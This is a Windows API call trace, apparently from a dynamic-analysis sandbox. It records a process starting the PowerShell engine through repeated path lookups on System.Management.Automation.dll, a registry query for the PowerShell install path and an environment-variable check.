	[0391.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.918] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d538 | out: phkResult=0x24d538*=0x364) returned 0x0
	[0391.919] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d4bc, lpData=0x0, lpcbData=0x24d4b8*=0x0 | out: lpType=0x24d4bc*=0x1, lpData=0x0, lpcbData=0x24d4b8*=0x56) returned 0x0
	[0391.919] CoTaskMemAlloc (cb=0x5a) returned 0x1b77b1f0
	[0391.919] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d48c, lpData=0x1b77b1f0, lpcbData=0x24d488*=0x56 | out: lpType=0x24d48c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d488*=0x56) returned 0x0
	[0391.919] CoTaskMemFree (pv=0x1b77b1f0) 
	[0391.919] RegCloseKey (hKey=0x364) returned 0x0
	[0391.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.926] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0391.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.926] CoTaskMemFree (pv=0x1b770f20) 
	[0391.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
